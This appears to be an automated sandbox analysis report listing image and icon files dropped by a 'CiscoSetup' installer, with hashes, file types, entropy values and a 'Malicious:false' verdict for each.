                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
